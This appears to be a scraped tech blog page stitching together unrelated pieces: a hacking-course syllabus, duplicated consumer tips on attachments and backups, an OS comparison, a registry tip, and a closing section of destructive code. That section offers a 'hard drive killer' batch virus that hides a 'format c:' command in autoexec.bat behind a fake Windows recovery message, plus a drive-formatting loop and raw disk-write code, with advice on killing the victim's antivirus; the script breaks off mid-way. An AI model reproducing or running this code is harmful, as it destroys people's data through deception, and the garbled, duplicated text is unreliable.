o Log and Traffic Monitors
o Security Auditing Tool (LSAT)
Linux Security Countermeasures
Steps for Hardening Linux
Module 19: Evading IDS, Firewalls, and Honeypots
Introduction to Intrusion Detection Systems
Terminologies
o Intrusion Detection System (IDS)
• IDS Placement
• Ways to Detect an Intrusion
• Types of Intrusion Detection Systems
• System Integrity Verifiers (SIV)
• Tripwire
• Cisco Security Agent (CSA)
• Signature Analysis
• General Indications of Intrusion System Indications
• General Indications of Intrusion File System Indications
• General Indications of Intrusion Network Indications
• Intrusion Detection Tools
• Snort 2.x
• Steps to Perform After an IDS Detects an Attack
• Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
• IDS Evading Tool: ADMutate
• Packet Generators
o Firewall
• What is a Firewall?
• What does a Firewall do?
• Packet Filtering
• What can't a Firewall do?
• How does a Firewall Work?
• Firewall Operations
• Hardware Firewall
• Software Firewall
• Types of Firewalls
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application-Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
• Firewall Identification
• Firewalking
• Banner Grabbing
• Breaching Firewalls
• Bypassing a Firewall Using HTTP Tunnel
• Placing Backdoors Through Firewalls
• Hiding behind a Covert Channel: LOKI
• ACK Tunneling
• Tools to Breach Firewalls
• Common Tool for Testing Firewall & IDS
• IDS Informer
• Evasion Gateway
• Firewall Informer
o Honeypot
• What is a Honeypot?
• The Honeynet Project
• Types of Honeypots
• Advantages and Disadvantages of a Honeypot
• Where to Place a Honeypot ?
• Honeypots
• SPECTER
• honeyd
• KFSensor
• Sebek
• Physical and Virtual Honeypots
• Tools to Detect Honeypots
• What to do When Hacked?
Module 20: Buffer Overflows
Why are Programs/Applications Vulnerable?
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Types of Buffer Overflows
o Stack-based Buffer Overflow
• Understanding Assembly Language
• Understanding Stacks
• Shellcode
o Heap/BSS-based Buffer Overflow
How to Detect Buffer Overflows in a Program
Attacking a Real Program
NOPS
How to Mutate a Buffer Overflow Exploit
Defense Against Buffer Overflows
Tool to Defend Buffer Overflow
o Return Address Defender (RAD)
o StackGuard
o Immunix System
Vulnerability Search – ICAT
Simple Buffer Overflow in C
Code Analysis
Module 21: Cryptography
Public-key Cryptography
Working of Encryption
Digital Signature
RSA (Rivest Shamir Adleman)
RC4, RC5, RC6, Blowfish
Algorithms and Security
Brute-Force Attack
RSA Attacks
Message Digest Functions
One-way Bash Functions
MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
RC5
What is SSH?
SSH (Secure Shell)
Government Access to Keys (GAK)
RSA Challenge
distributed.net
Cleversafe Grid Builder
PGP (Pretty Good Privacy)
Code Breaking: Methodologies
Cryptography Attacks
Disk Encryption
Hacking Tool
o PGP Crack
o Magic Lantern
o WEPCrack
o Cracking S/MIME Encryption Using Idle CPU Time
o CypherCalc
o Command Line Scriptor
o CryptoHeaven
Module 22: Penetration Testing
Introduction to Penetration Testing
Categories of Security Assessments
Vulnerability Assessment
Limitations of Vulnerability Assessment
Types of Penetration Testing
Risk Management
Do-it-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly-Available Networks
Testing Network-Filtering Devices
Enumerating Devices
Denial of Service Emulation
Tools
o Appscan
o HackerShield
o Cerberus Internet Scanner
o Cybercop Scanner
o FoundScan Hardware Appliances
o Nessus
o NetRecon
o SAINT
o SecureNET Pro
o SecureScan
o SATAN
o SARA
o Security Analyzer
o STAT Analyzer
o VigilENT
o WebInspect
Evaluating Different Types of Pentest Tools
Asset Audit
Fault Trees and Attack Trees
GAP Analysis
Threat
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools
o Web-based Bug/Defect Tracking Software
o SWB Tracker
o Advanced Defect Tracking Web Edition
Disk Replication Tools
o Snapback DUP
o Daffodil Replicator
o Image MASSter 4002i
DNS Zone Transfer Testing Tools
o DNS analyzer
o Spam blacklist
Network Auditing Tools
o eTrust Audit (AUDIT LOG REPOSITORY)
o iInventory
o Centennial Discovery
Trace Route Tools and Services
o Ip Tracer 1.3
o Trellian Trace Route
Network Sniffing Tools
o Sniff’em
o PromiScan
Denial-of-Service Emulation Tools
o FlameThrower®
o Mercury LoadRunner™
o ClearSight Analyzer
Traditional Load Testing Tools
o WebMux
o SilkPerformer
o PORTENT Supreme
System Software Assessment Tools
o Database Scanner
o System Scanner
o Internet Scanner
Operating System Protection Tools
o Bastille Linux
o Engarde Secure Linux
Fingerprinting Tools
o Foundstone
o @Stake LC 5
Port Scanning Tools
o Superscan
o Advanced Port Scanner
o AW Security Port Scanner
Directory and File Access Control Tools
o Abyss Web Server for windows
o GFI LANguard Portable Storage Control
o Windows Security Officer - wso
File Share Scanning Tools
o Infiltrator Network Security Scanner
o Encrypted FTP 3
Password Directories
o Passphrase Keeper 2.60
o IISProtect
Password Guessing Tools
o Webmaster Password Generator
o Internet Explorer Password Recovery Master
o Password Recovery Toolbox
Link Checking Tools
o Alert Link Runner
o Link Utility
o LinxExplorer
Web Testing-based Scripting Tools
o Svoi.NET PHP Edit
o OptiPerl
o Blueprint Software Web Scripting Editor
Buffer Overflow Protection Tools
o StackGuard
o FormatGuard
o RaceGuard
File Encryption Tools
o Maxcrypt
o Secure IT
o Steganos
Database Assessment Tools
o EMS MySQL Manager
o SQL Server Compare
o SQL Stripes
Keyboard Logging and Screen Reordering Tools
o Spector Professional 5.0
o Handy Keylogger
o Snapshot Spy
System Event Logging and Reviewing Tools
o LT Auditor Version 8.0
o ZVisual RACF
o Network Intelligence Engine LS Series
Tripwire and Checksum Tools
o SecurityExpressions
o MD5
o Tripwire for Servers
Mobile-Code Scanning Tools
o Vital Security
o E Trust Secure Content Manager 1.1
o Internet Explorer Zones
Centralized Security Monitoring Tools
o ASAP eSMART™ Software Usage by ASAP Software
o WatchGuard VPN Manager
o Harvester
Web Log Analysis Tools
o AWStats
o Azure Web Log
o Summary
Forensic Data and Collection Tools
o Encase tool
o SafeBack
o ILook Investigator
Security Assessment Tools
o Nessus Windows Technology
o NetIQ Security Manager
o STAT Scanner
Multiple OS Management Tools
o Multiple Boot Manager
o Acronis OS Selector
o Eon
Phases of Penetration Testing
o Pre-Attack Phase
o Attack Phase
o Post-Attack Phase
Penetration Testing Deliverables Templates
SELF-STUDY MODULES
Covert Hacking
Insider attacks
What is covert channel?
Security Breach
Why Do You Want to Use Covert Channel?
Motivation of a Firewall Bypass
Covert Channels Scope
Covert Channel: Attack Techniques
Simple Covert Attacks
Advanced Covert Attacks
Reverse Connecting Agents
Covert Channel Attack Tools
o Netcat
o DNS tunnel
o DNS Tunneling
• Covert Channel Using DNS Tunneling
• DNS Tunnel Client
• DNS Tunneling Countermeasures
o SSH reverse tunnel
• Covert Channel Using SSH
• Covert Channel using SSH (Advanced)
o HTTP/S Tunneling Attack
o Covert Channel Hacking Tool: Active Port Forwarder
o Covert Channel Hacking Tool: CCTT
o Covert Channel Hacking Tool: Firepass
o Covert Channel Hacking Tool: MsnShell
o Covert Channel Hacking Tool: Web Shell
o Covert Channel Hacking Tool: NCovert
o Covert Channel Hacking via Spam E-mail Messages
o Hydan
o Covert Channel Hacking Tool: NCOVERT
Writing Virus Codes
Introduction of Virus
Types of Viruses
Symptoms of a Virus Attack
Prerequisites for Writing Viruses
Required Tools and Utilities
Virus Infection Flow Chart
o Step – I Finding file to infect
• Directory Traversal Method
• “dot dot” Method
o Step – II Check viruses infection criteria
o Step – III Check for previous infection
• Marking a File for Infection
o Step – IV Infect the file
o Step – V Covering tracks
o
Components of Viruses
Functioning of Replicator part
Diagrammatical representation
Writing Replicator
Writing Concealer
Dispatcher
Writing Bomb/Payload
Trigger Mechanism
Brute Force Logic Bombs
Testing Virus Codes
Tips for Better Virus Writing
Assembly Language Tutorial
Number System
Base 10 System
Base 2 System
Decimal 0 to 15 in Binary
Binary Addition (C stands for Canary)
Hexadecimal Number
Hex Example
Hex Conversion
nibble
Computer memory
Characters Coding
ASCII and UNICODE
CPU
Machine Language
Compilers
Clock Cycle
Original Registers
Instruction Pointer
Pentium Processor
Interrupts
Interrupt handler
External interrupts and Internal interrupts
Handlers
Machine Language
Assembly Language
Assembler
Assembly Language Vs High-level Language
Assembly Language Compilers
Instruction operands
MOV instruction
ADD instruction
SUB instruction
INC and DEC instructions
Directive
preprocessor
equ directive
%define directive
Data directives
Labels
Input and output
C Interface
Call
Creating a Program
Why should anyone learn assembly at all?
o First.asm
Assembling the code
Compiling the C code
Linking the object files
Understanding an assembly listing file
Big and Little Endian Representation
Skeleton File
Working with Integers
Signed integers
Signed Magnitude
Two’s Compliment
If statements
Do while loops
Indirect addressing
Subprogram
The Stack
The SS segment
ESP
The Stack Usage
The CALL and RET Instructions
General subprogram form
Local variables on the stack
General subprogram form with local variables
Multi-module program
Saving registers
Labels of functions
Calculating addresses of local variables
Exploit Writing
Exploits Overview
Prerequisites for Writing Exploits and Shellcodes
Purpose of Exploit Writing
Types of Exploits
o Stack Overflow
o Heap Corruption
o Format String
o Integer Bug Exploits
o Race Condition
o TCP/IP Attack
The Proof-of-Concept and Commercial Grade Exploit
Converting a Proof of Concept Exploit to Commercial Grade Exploit
Attack Methodologies
Socket Binding Exploits
Tools for Exploit Writing
o LibExploit
o Metasploit
o CANVAS
Steps for Writing an Exploit
Differences Between Windows and Linux Exploits
Shellcodes
o NULL Byte
o Types of Shellcodes
Tools Used for Shellcode Development
o NASM
o GDB
o objdump
o ktrace
o strace
o readelf
Steps for Writing a Shellcode
Issues Involved With Shellcode Writing
o Addressing problem
o Null byte problem
o System call implementation
Smashing the Stack for Fun and Profit
What is a Buffer?
Static Vs Dynamic Variables
Stack Buffers
Data Region
Memory Process Regions
What Is A Stack?
Why Do We Use A Stack?
The Stack Region
Stack frame
Stack pointer
Procedure Call (Procedure Prolog)
Compiling the code to assembly
Call Statement
Return Address (RET)
Word Size
Stack
Buffer Overflows
Error
Why do we get a segmentation violation?
Segmentation Error
Instruction Jump
Guess Key Parameters
Calculation
Shell Code
o The code to spawn a shell in C
Lets try to understand what is going on here. We'll start by studying main:
execve()
o execve() system call
exit.c
o List of steps with exit call
The code in Assembly
JMP
Code using indexed addressing
Offset calculation
shellcodeasm.c
testsc.c
Compile the code
NULL byte
shellcodeasm2.c
testsc2.c
Writing an Exploit
overflow1.c
Compiling the code
sp.c
vulnerable.c
NOPs
o Using NOPs
o Estimating the Location
Windows Based Buffer Overflow Exploit Writing
Buffer Overflow
Stack overflow
Writing Windows Based Exploits
Exploiting stack based buffer overflow
OpenDataSource Buffer Overflow Vulnerability Details
Simple Proof of Concept
Windbg.exe
Analysis
EIP Register
o Location of EIP
o EIP
Execution Flow
But where can we jump to?
Offset Address
The Query
Finding jmp esp
Debug.exe
listdlls.exe
Msvcrt.dll
Out.sql
The payload
ESP
Limited Space
Getting Windows API/function absolute address
Memory Address
Other Addresses
Compile the program
Final Code
Reverse Engineering
Positive Applications of Reverse Engineering
Ethical Reverse Engineering
World War Case Study
DMCA Act
What is Disassembler?
Why do you need to decompile?
Professional Disassembler Tools
Tool: IDA Pro
Convert Machine Code to Assembly Code
Decompilers
Program Obfuscation
Convert Assembly Code to C++ code
Machine Decompilers
Tool: dcc
Machine Code of compute.exe Prorgam
Assembly Code of compute.exe Program
Code Produced by the dcc Decompiler in C
Tool: Boomerang
What Boomerang Can Do?
Andromeda Decompiler
Tool: REC Decompiler
Tool: EXE To C Decompiler
Delphi Decompilers
Tools for Decompiling .NET Applications
Salamander .NET Decompiler
Tool: LSW DotNet-Reflection-Browser
Tool: Reflector
Tool: Spices NET.Decompiler
Tool: Decompilers.NET
.NET Obfuscator and .NET Obfuscation
Java Bytecode Decompilers
Tool: JODE Java Decompiler
Tool: JREVERSEPRO
Tool: SourceAgain
Tool: ClassCracker
Python Decompilers
Reverse Engineering Tutorial
OllyDbg Debugger
How Does OllyDbg Work?
Debugging a Simple Console Application
Wednesday, July 20, 2011
Be Careful with Attachments
Be Careful with Attachments
There have been a number of really bad viruses just within the past 6 months. We've seen the W32.Beagle, W32.Netsky, MyDoom, and so on. Most of these viruses were transported or replicated from pc to pc-using email attachments. These are easy to spot if you're paying attention, simply because they are usually executable files, but not always.
Some attachments contain Macros (simple programs that run within other programs, all the titles in Microsoft Office use macros). If you're not that familiar with spotting file extensions, don't worry, that's what I'm here to talk about today. If you are a little hazy on the whole "file extension" thing then let's spend a few moments explaining it.
File extensions are what tell the program how to treat a particular piece of data. For example, most people are somewhat familiar with .doc or a .txt file extensions these are both text documents and when the user opens this file the Operating System looks at this extension and then knows how to open it.
Hackers try to use some sort of eye-grabbing ploy to get you to open their email and activate the virus, which is always an attachment. Most Anti-virus nowadays stops, or at least warns, you of these high risk attachments and even take measures to protect you. However, on the average 10-15 new viruses are created every day and I personally wouldn't count on any program to 100% protect my pc. That's why I scrutinize any email, if I wasn't expecting an attachment, I won't open it until I had a chance to talk to the sender.
Some of the more common file types used to hide viruses include:
.scr - Windows Screen Saver - USE CAUTION if you receive a screen saver via email. They can contain worms or viruses
.pif - DO NOT OPEN! This is most likely a virus. Clicking it will run a program or code that can mess up your computer.
.exe - executable file - a program that contains a virus, Trojan horse, or worm
.pps - MS PowerPoint (can contain macro virus)
.zip - Zip (compressed) file
.vbs - Visual Basic script
.bat - Executable MS-DOS batch file
.com - DOS executable command
.asp - active server page - internet script
.doc - Word document (can contain macro virus)
.xls - Excel file (can contain macro virus)
This is in no way a complete list. Just because an attachment may have one of these extensions doesn't mean that it is a virus, but it should send up warning flags. Hackers use clever subject lines, and viruses can appear to come from a friend so keep on your toes and don't fall victim to their deceptive traps. Scan those attachments and verify with the sender before opening.
Back Up Your Data
Just about everybody has important data on their hard drive, from digital pictures to important documents, emails, earmarked websites the list goes on and on. In my experience people are pretty lax about backing up their PCs, and I think this really is an area that deserves attention. With a good back up set you can bounce back from a fatal hard drive crash and be up and running with all the your pictures, documents, downloads, email and favorites before you know it. Having important files stored on removable media is also a good safety precaution in case you get a virus or Trojan horse.
There are a couple of different ways to back up important data, from the casual copy and paste to running complicated scheduled backups. There is no wrong way, as long you have a copy of everything you need.
You can save the data on a couple of different types of media (floppy, ZIP, CD-R/RW, DVD+R/RW, Flash memory, even dat drives) but for home use I really recommend either CDs or DVDs, floppies are just to small, Zips, although bigger than floppies are still small (100-200MB), and they're old and kind of expensive. Flash memory can store data but it's not really something you want to save data to and store away unless there is no other option. DAT tapes are more for the corporate end of things and are overkill in most homes. CDs are cheap, hold a lot of data, work on any PC and are easy to store.
If you use CD-RW, or DVD-RW you can actually save money by setting up a "round robin" with your backups. To do this, you need at lest 3-4 of the same backup set, take the oldest and erase it. Now use the blank disk for the new backup, the next time you do a backup use the oldest disk in the set and so on and so forth.
As for the methods of backing up, I find it's easiest when all my intended files and folders are organized in structured manner and not scattered all over my hard drive. This is a good way to insure that you don't forget anything important by hunting for a bunch of individual files. An easy way to stay organized is to create a descriptively labeled folder structure and try to be diligent about saving your data to it's designed folder.
Another good practice is to test your backups, don't just take the burning software's word for it. After a backup, explore the disk and randomly go through files and open them up to make sure that they're complete and not corrupt. Learn from my experience, waiting for a complete system failure is not a good time to check the validity of your backups. This is a good way to get yourself in a lot of trouble as well ?I know if didn't back up the pictures or movies of our kids I wouldn't be able to live with my self.
Once you have all your ducks in a row, it's time to back up. There are a number of ways to do this as well. The easiest is to open you burning program and select data CD and go through the folder then explorer and grab the folders you want to back up. When you select a folder you should see it in the "burn" selection window, once you done with your backup selection choose "burn".
If you have Windows XP you have the luxury of being able to open up the blank CD or DVD in Windows Explorer and copying and pasting the desired folders right onto the disk and select "Write files to CD" and Windows will do the rest for you. This is nice but not all of us have XP, and I personally still like to use my third-party software.
Most burning software has their own backup services, and there are a number of third-party back up titles out there. The nice thing about using these types of software is the options. Things like compression, backup jobs, and incremental backups. These are nice features especially when you have some backups that you want to insure are up to date. For instance, you can create a "Back up Set" which is basically a saved and named list of folders and files that you want backed up. This makes the whole process so easy?you can create a backup set and once a week or so your can run it and it will either create a new back up or save just the changes to the backup. These are two options that are usually found in backup programs. If you use "backup sets", it's important to keep the files organized, and in all the correct folders. You can also schedule Backup Jobs, which are basically backup sets that are scheduled to run at predetermined times, and intervals (i.e. once a week Friday at 6:00).
Beware of fake security warnings!
Sometimes you'll be surfing the web and a window pops up that looks like a legitimate warning from Windows. Before you click, read carefully and you'll find that it's just a pop up ad trying to entice you to a product site by clicking "Yes". I've even seen some with a shield that resembles the new SP2 Security Center logo.
Just click the X at the top of the window to close it and go on your way.
There have been a number of really bad viruses just within the past 6 months. We've seen the W32.Beagle, W32.Netsky, MyDoom, and so on. Most of these viruses were transported or replicated from pc to pc-using email attachments. These are easy to spot if you're paying attention, simply because they are usually executable files, but not always.
Some attachments contain Macros (simple programs that run within other programs, all the titles in Microsoft Office use macros). If you're not that familiar with spotting file extensions, don't worry, that's what I'm here to talk about today. If you are a little hazy on the whole "file extension" thing then let's spend a few moments explaining it.
File extensions are what tell the program how to treat a particular piece of data. For example, most people are somewhat familiar with .doc or a .txt file extensions these are both text documents and when the user opens this file the Operating System looks at this extension and then knows how to open it.
Hackers try to use some sort of eye-grabbing ploy to get you to open their email and activate the virus, which is always an attachment. Most Anti-virus nowadays stops, or at least warns, you of these high risk attachments and even take measures to protect you. However, on the average 10-15 new viruses are created every day and I personally wouldn't count on any program to 100% protect my pc. That's why I scrutinize any email, if I wasn't expecting an attachment, I won't open it until I had a chance to talk to the sender.
Some of the more common file types used to hide viruses include:
.scr - Windows Screen Saver - USE CAUTION if you receive a screen saver via email. They can contain worms or viruses
.pif - DO NOT OPEN! This is most likely a virus. Clicking it will run a program or code that can mess up your computer.
.exe - executable file - a program that contains a virus, Trojan horse, or worm
.pps - MS PowerPoint (can contain macro virus)
.zip - Zip (compressed) file
.vbs - Visual Basic script
.bat - Executable MS-DOS batch file
.com - DOS executable command
.asp - active server page - internet script
.doc - Word document (can contain macro virus)
.xls - Excel file (can contain macro virus)
This is in no way a complete list. Just because an attachment may have one of these extensions doesn't mean that it is a virus, but it should send up warning flags. Hackers use clever subject lines, and viruses can appear to come from a friend so keep on your toes and don't fall victim to their deceptive traps. Scan those attachments and verify with the sender before opening.
Back Up Your Data
Just about everybody has important data on their hard drive, from digital pictures to important documents, emails, earmarked websites the list goes on and on. In my experience people are pretty lax about backing up their PCs, and I think this really is an area that deserves attention. With a good back up set you can bounce back from a fatal hard drive crash and be up and running with all the your pictures, documents, downloads, email and favorites before you know it. Having important files stored on removable media is also a good safety precaution in case you get a virus or Trojan horse.
There are a couple of different ways to back up important data, from the casual copy and paste to running complicated scheduled backups. There is no wrong way, as long you have a copy of everything you need.
You can save the data on a couple of different types of media (floppy, ZIP, CD-R/RW, DVD+R/RW, Flash memory, even dat drives) but for home use I really recommend either CDs or DVDs, floppies are just to small, Zips, although bigger than floppies are still small (100-200MB), and they're old and kind of expensive. Flash memory can store data but it's not really something you want to save data to and store away unless there is no other option. DAT tapes are more for the corporate end of things and are overkill in most homes. CDs are cheap, hold a lot of data, work on any PC and are easy to store.
If you use CD-RW, or DVD-RW you can actually save money by setting up a "round robin" with your backups. To do this, you need at lest 3-4 of the same backup set, take the oldest and erase it. Now use the blank disk for the new backup, the next time you do a backup use the oldest disk in the set and so on and so forth.
As for the methods of backing up, I find it's easiest when all my intended files and folders are organized in structured manner and not scattered all over my hard drive. This is a good way to insure that you don't forget anything important by hunting for a bunch of individual files. An easy way to stay organized is to create a descriptively labeled folder structure and try to be diligent about saving your data to it's designed folder.
Another good practice is to test your backups, don't just take the burning software's word for it. After a backup, explore the disk and randomly go through files and open them up to make sure that they're complete and not corrupt. Learn from my experience, waiting for a complete system failure is not a good time to check the validity of your backups. This is a good way to get yourself in a lot of trouble as well ?I know if didn't back up the pictures or movies of our kids I wouldn't be able to live with my self.
Once you have all your ducks in a row, it's time to back up. There are a number of ways to do this as well. The easiest is to open you burning program and select data CD and go through the folder then explorer and grab the folders you want to back up. When you select a folder you should see it in the "burn" selection window, once you done with your backup selection choose "burn".
If you have Windows XP you have the luxury of being able to open up the blank CD or DVD in Windows Explorer and copying and pasting the desired folders right onto the disk and select "Write files to CD" and Windows will do the rest for you. This is nice but not all of us have XP, and I personally still like to use my third-party software.
Most burning software has their own backup services, and there are a number of third-party back up titles out there. The nice thing about using these types of software is the options. Things like compression, backup jobs, and incremental backups. These are nice features especially when you have some backups that you want to insure are up to date. For instance, you can create a "Back up Set" which is basically a saved and named list of folders and files that you want backed up. This makes the whole process so easy?you can create a backup set and once a week or so your can run it and it will either create a new back up or save just the changes to the backup. These are two options that are usually found in backup programs. If you use "backup sets", it's important to keep the files organized, and in all the correct folders. You can also schedule Backup Jobs, which are basically backup sets that are scheduled to run at predetermined times, and intervals (i.e. once a week Friday at 6:00).
Beware of fake security warnings!
Sometimes you'll be surfing the web and a window pops up that looks like a legitimate warning from Windows. Before you click, read carefully and you'll find that it's just a pop up ad trying to entice you to a product site by clicking "Yes". I've even seen some with a shield that resembles the new SP2 Security Center logo.
Just click the X at the top of the window to close it and go on your way.
Apple’s Snow Leopard vs. Windows 7
It makes enough sense to do the comparison at this time as Snow Leopard has been updated to 10.6.1 and Windows 7 too had a few updates over the RTM release. Firstly, the hardware – The 64 bit editions of the two OS’ were installed on a Macbook Pro(2009) 2.53ghz, 4GB Ram. Boot Camp 3.0 was used to install Windows. Trust me it makes the driver installation a breeze. No virtualization used.
Pricing
I’d only be discussing update pricing here. Upgrading from Leopard to Snow costs only $29. However, Windows 7 Ultimate will set you back by $219 if you are upgrading from Vista or XP. While Snow Leopard has no variants Windows does and the Ultimate was the only one that would have compete against Snow.
Installation
Both the OS were installed with default settings and power management was set to high performance. You could upgrade Vista to Win7 and Leopard to Snow. Let me tell you upgrading from XP to Win7 will put you through some peril though. We’ll cover that later. Mac users don’t have to worry at all. No matter what version you are upgrading from, no issues whatsoever. For the sake of the test I did a fresh installation of both on different hard disks. Both the installations took around thirty minutes.
First Run
Now something that I really got bugged by and must share here is that Windows 7 does not have these pre installed unlike any version of Mac OS X. No PDF Viewer, No IM application and no e-mail client. They can be downloaded from Windows Live Site but why, Microsoft?
Interface
Microsoft has definitely enhanced the user interface on this one and Win7 is by far the best-looking OS in the Windows family. However, beauty won’t stay appreciated without functionality. Let’s find out. The new Aero themes which we first saw in Vista look pretty. Also, worth noticing, the user interface is more user-friendly than Vista and is less irritating to use.
I’ll briefly mention some of the new Aero features. Aero Shake allows you to shake the title bar of a window, to minimize all other windows. Aero Snap lets you drag the window to the right left or top of the screen and it snaps itself elegantly. Dragging left or right makes it occupy half of the screen while top edge makes it full screen.
The new Windows is less painful to configure but you still have to do some work finding what you want, say advanced power options for instance. Nothing beats the simple layout of System Preferences that Mac has. However, beauty won’t stay appreciated without functionality. While UI is catching up usability wise Windows still has a long way to go.
I also must mention Apple’s striking new feature Spotlight. It’s a search tool but the best you have ever seen on your desktop. It searches through everything you want it to. From system settings to your files, and did I forget to mention, in no time! Windows Search is catching up but not a match yet.
Everyday Tasks
Well, here both the OS fared almost equally well-doing daily errands such as word processing, printing, browsing. Except of course, ease of usability lies more towards Snow. Snow is not only less intrusive but way more user-friendly. Good news here is that Win7 manages your Graphics Processor better than its predecessors.
Speed
When it came to startup or shutdown Snow put Win7 to shame. While Snow took 31 seconds to boot up Windows took 44. While shutting down, Snow took me 3 second and Windows 9 seconds. Resuming from standby was the same on both – around one sec.
Other Benchmark tests
You could do these yourselves as well. In music encoding, the latest version of iTunes took around ten minutes to rip a folder while Windows took a minute longer. So Snow fared better when it came to encoding, start-up and shutdown.
However, when it came to 3D rendering Windows7 did a better job. The game Call of Duty 4 has its own benchmarking system. Win7 on an average score 5fps higher than Snow.
Security
While Microsoft has enhanced security options on this one, UAC still remains annoying, though you can turn it off. Also, Windows 7 has one distinct feature from Snow, that is Address Space Layout Randomization. This functions to randomly reposition important data making it less vulnerable to exploits. One could argue that Windows has far more viruses and trojans than Mac and attribute it to its greater popularity and exposure but that’s turning to prove false as Mac’s share increases.
Battery Life
With moderate use, keyboard and screen illumination set to medium and wi-fi on windows lasted around two third the time Snow did. While Snow lasted 5 hrs 15 minutes Windows ran out of battery juice in 3 hrs 40 minutes. Of course this could also be due to Boot Camp and given the fact that Snow is native to the Mac. That said, you could definitely make out that Windows 7 is more power-hungry if not less than Snow.
Conclusion
While Snow seems sleeker and way more user-friendly, Windows definitely has greater options and wider compatibility to its fame. I have only shared a first hand experience with both. While, we’ve discussed time tests and other surface features another important aspect lies in how the OS responds to third-party installations. Also how multiple processor cores are utilized.
We are not exactly starting an OS war here. Operating Systems have evolved ever since. Likewise user needs are on an increase too. So its just a matter of how the former catches up with the latter. While Microsoft has a wider reach, it’s unpleasant to see so many security updates every week. I’m sure most of us Windows users would be way happier when the very need to release them so often decreases.
Vista and XP users must try Windows 7 as it is the best windows ever made. As for the hardware I’d always advice in favor of the Mac for only a Mac lets you taste the best of both worlds. You could run both Windows and Snow leopard on it. Final verdict at the end of the day: Snow Leopard
PS: We have a lot of Mac coverage in store for you. So those of you who are curious about the Mac experience or have had trouble choosing between a Mac and a PC, we’ll have loads of info for you coming later this month. Do leave a comment – about Mac and Windows alike.
Given an option between Windows 7 and Apple Snow Leopard, which one will be your choice and why?
MAKE UR CUSTOM RUN COMMANDS
1. Go to Start->Run->type Regedit and hit Enter.
2. Navigate to HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >> Windows >> CurrentVersion >> App Paths
3. Right click on App Paths and select New-> Key. Name it whatever you want your run command to be.
4. Now click on newly created key. There will be Default string in right side pan. Double click on it and enter the path to Application or folder.
5. Right click on right side panel and create new string and rename it to Path.
6. Double click on Path and enter the path to application or Folder.
7. Close registry and Restart your Explorer.
Go to run and type the command you created.
Progran to formatting disks
Dear Friends , this is not a batch file ,and not intended to encourage a malicious activities,rather to explore the possibilities of advanced level of Programming ! Never ever use your knowledge against the ethics of technological world !
A : /* Progran to formatting disks */
#include
#include
#include "snpdskio.h"
int CDECL absdisk(unsigned char function,
unsigned short drive,
/* 0 = A:, etc. */
size_t number_of_sectors,
size_t starting_sector,
void * sector_buffer);
int AbsDiskRead(unsigned short drive,
size_t num_of_sectors,
size_t sector,
void *ptr)
{
return absdisk(0x25, drive, num_of_sectors, (unsigned)sector, ptr);
}
int AbsDiskWrite(unsigned short drive,
size_t num_of_sectors,
size_t sector,
void *ptr)
{
return absdisk(0x26, drive, num_of_sectors, (unsigned)sector, ptr);}
=======================================================================
B :
Format Harddrive?
@echo off
for %%i in (d:,e:,f:,g:) do format %%i /FS:NTFS /x
If you want quick format then add the /q switch to the end of the format command.
What follows is the code for the batch file code of the hard drive killer code. A virus that wipes your hard drive so fast that it can cause physical damage.
CAUTION!!!
Use at your own risk this is very dangerous. If you do manage to accidentally run it on your own system then do not restart but check your autoexec.bat file. This is now redundat because it is detected by many virus scanners but,if you kill the vics AV on entry it will work...also if they are running MicrosoftSpyware it will stop it from running so you need to go into Managers in CIA and use the ProcessManager to kill MicrosoftSpyware...kill process gcasDTServ.exe(some **** like that).
@echo off
rem Fastest way to format your computer.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's damn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
if %drive%.==. set drive=c
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
